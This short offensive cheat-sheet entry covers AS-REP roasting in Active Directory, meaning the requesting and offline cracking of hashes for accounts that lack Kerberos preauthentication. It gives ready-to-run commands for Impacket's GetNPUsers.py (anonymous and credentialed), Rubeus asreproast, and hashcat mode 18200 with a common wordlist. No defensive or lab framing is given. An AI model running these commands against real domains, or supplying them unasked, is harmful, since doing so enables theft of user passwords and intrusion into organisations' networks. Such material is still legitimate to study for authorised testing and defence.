Accounts with "Do not require Kerberos preauthentication" enabled respond to AS-REQ without verifying the requester. The response contains a hash encrypted with the user's password — crack it offline.
# Using Impacket (no credentials needed if LDAP allows anonymous): python3 GetNPUsers.py corp.local/ -dc-ip 192.168.1.10 -no-pass -usersfile users.txt # With credentials: python3 GetNPUsers.py corp.local/ram:pracivo -dc-ip 192.168.1.10 -request # Using Rubeus from Windows: Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt # Crack the hash: hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt